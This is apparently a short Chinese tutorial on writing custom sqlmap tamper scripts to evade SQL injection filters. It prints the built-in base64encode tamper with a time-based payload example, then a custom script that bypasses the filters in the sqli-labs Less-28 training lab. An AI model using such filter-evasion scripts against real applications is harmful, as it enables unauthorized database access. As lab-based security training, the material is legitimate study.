0x00
$ python sqlmap.py --list-tampers #查看内置tamper
sqlmap提供了很多的内置tamper,其包含了常见数据库的sql注入绕过,可在特定条件下进行SQL注入绕过防御。
0x01
--tamper=xxx.py
使用时加上tamper选项即可。
0x02
根据具体情况编写自己的tamper脚本
依据自己当前分析或fuzz出的原理
照猫画虎,动手编写
0x03
先看一下内置tamper base64encode.py的写法,了解了内置tamper的写法,只需对此照猫画虎即可!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import base64
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload
|
以sqli-labs/Less_28为编写示列:已知此场景对 /、 *、 -、 #、 space(空格)、 +、 union\s+select进行了过滤处理,对此编写脚本如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Bypass sqli-lab/Less-28
"""
if payload:
payload = payload.replace('union select','union all select').replace(' ','%0a')
return payload
|
参考: web安全工程师(进阶)-网易云课堂.
